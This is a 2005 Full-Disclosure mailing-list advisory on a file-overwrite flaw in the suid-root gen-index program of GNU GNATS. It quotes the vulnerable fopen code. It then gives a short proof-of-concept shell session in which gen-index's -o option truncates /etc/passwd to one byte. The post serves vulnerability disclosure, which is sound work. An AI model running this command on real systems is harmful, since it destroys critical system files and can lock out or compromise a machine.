[Full-disclosure] GNATS - gen-index
From: Adam Zabrocki (pi3ki31ny_at_wp.pl)
Date: 07/06/05
- Previous message: Martin Pitt: "[Full-disclosure] [USN-147-2] Fixed php4-pear packages for USN-147-1"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Wed, 6 Jul 2005 17:08:11 +0200 To: full-disclosure@lists.grok.org.uk
Name: GNATS - gen-index
Vendor URL: http://www.gnu.org/software/gnats
Author: Adam Zabrocki <pi3ki31ny@wp.pl>
Date: June 16, 2005
Issue:
GNATS - the GNU problem report management system allows
attacker to overwrite
files with privileges suid root (when compiled from sources and
there isn't in system
gnats user), where GNATS is installed.
Description:
GNATS stores all information about the problem reports at a
central site, and enables
users to access this site by various means, including e-mail,
WWW, and a network daemon.
New problem reports can be created, and existing reports can be
queried and updated, by
most of these means.
Details:
Possible overwrite any files in system by gen-index
program installed
with GNATS.
Local users, able to run gen-index (in some times when GNATS
was compiled from sources
and in system don't exist gnats user and group) are able to
overwrite any files in system.
The problem lies in gen-index main() function, which don't
check argument who was given
to program and in hard open and write there own data.
"gnats/gen-index.c"
int
main (int argc, char **argv)
{
...
...
while ((optc = getopt_long (argc, argv, "o:hd:nVie",
long_options, (int *) 0)) != EOF)
{
switch (optc)
{
...
...
case 'o':
file_name = optarg;
break;
case 'n':
numeric_sorting = TRUE;
break;
...
...
}
}
...
...
if (file_name)
output = fopen (file_name, "w+");
if (output == (FILE *) NULL)
{
fprintf (stderr, "%s: can't write to %s: %s\n",
program_name,
optarg, strerror (errno));
exit (3);
}
...
...
if (indexIsBinary (database))
{
char numFields = indexFieldCount (database);
fwrite (&numFields, 1, 1, output);
}
...
...
if (numeric_sorting && num_entries > 0)
{
qsort (entries, num_entries, sizeof (Entry), entry_cmp);
for (i = 0; i < num_entries; i++)
{
fwrite (entries[i].string, 1, entries[i].length,
output);
}
}
fclose (output);
...
exit (0);
}
Function fopen() with argument "w+" open file for reading and
writing.
The file is created if it does not exist, otherwise it is
truncated.
So when gen-index have suid root privilages we can overwrite any
files
in system.
Exploit:
We don't need to write any 31337 exploit. Simple PoC:
pi3@darkstar:~$ pwd
/home/pi3
pi3@darkstar:~$ ls -alh /etc/passwd
-rw-r--r-- 1 root root 795 May 19
18:49 /etc/passwd
pi3@darkstar:~$ ls -alh /usr/local/libexec/gnats/gen-index
-r-sr-xr-x 1 root root 465k Nov 21
2004 /usr/local/libexec/gnats/gen-index*
pi3@darkstar:~$ /usr/local/libexec/gnats/gen-index -n -
o /etc/passwd
pi3@darkstar:~$ ls -alh /etc/passwd
-rw-r--r-- 1 root root 1 Jun 16
17:34 /etc/passwd
pi3@darkstar:~$ cat /etc/passwd
pi3@darkstar:~$
GNATS 4.1.0 and 4.0 are confirmed vulnerable. Probably all
previous versions are also vulnerable.
I have informed GNATS team.
-- pi3 (pi3ki31ny) - pi3ki31ny@wp.pl http://www.pi3.int.pl ---------------------------------------------------- Uroda.wp.pl - Nowy, kobiecy serwis internetowy! - Teraz zawsze pod ręką. W lipcu Joanna Brodzik - poznaj jej sekrety: Kliknij: http://klik.wp.pl/?adr=www.uroda.wp.pl&sid=424 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
- Previous message: Martin Pitt: "[Full-disclosure] [USN-147-2] Fixed php4-pear packages for USN-147-1"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
